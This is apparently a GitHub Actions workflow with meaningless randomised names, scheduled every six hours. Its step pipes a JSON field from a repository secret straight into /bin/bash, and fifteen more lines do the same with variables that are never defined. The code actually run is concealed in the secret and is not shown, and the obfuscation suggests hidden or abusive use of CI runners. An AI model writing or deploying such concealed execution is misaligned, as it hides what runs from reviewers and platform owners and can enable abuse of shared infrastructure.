name: liaogaitx

on:
  workflow_dispatch:
  schedule:
    - cron: '42 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: liaogaitx
        env:
          witzg9841: ${{ secrets.witzg9841 }}
        run: |
          echo $witzg9841 | jq -r .t84961 | /bin/bash
          echo $tigf33 | jq -r .ecy92620 | /bin/bash
          echo $imen0939 | jq -r .hatgd5457 | /bin/bash
          echo $nhecy40160 | jq -r .qkyas27 | /bin/bash
          echo $uaxfd5 | jq -r .pncne264 | /bin/bash
          echo $m1 | jq -r .srzaq204 | /bin/bash
          echo $l44 | jq -r .e15880 | /bin/bash
          echo $igm91 | jq -r .de941 | /bin/bash
          echo $ib8 | jq -r .l22 | /bin/bash
          echo $na2024 | jq -r .ukydr5835 | /bin/bash
          echo $fmh4589 | jq -r .zbvv14 | /bin/bash
          echo $zs534 | jq -r .vdgo594 | /bin/bash
          echo $uwh898 | jq -r .jhu2 | /bin/bash
          echo $qj8 | jq -r .ck1624 | /bin/bash
          echo $sjo3 | jq -r .g467 | /bin/bash
          echo $mlgmh28649 | jq -r .xmdal3378 | /bin/bash

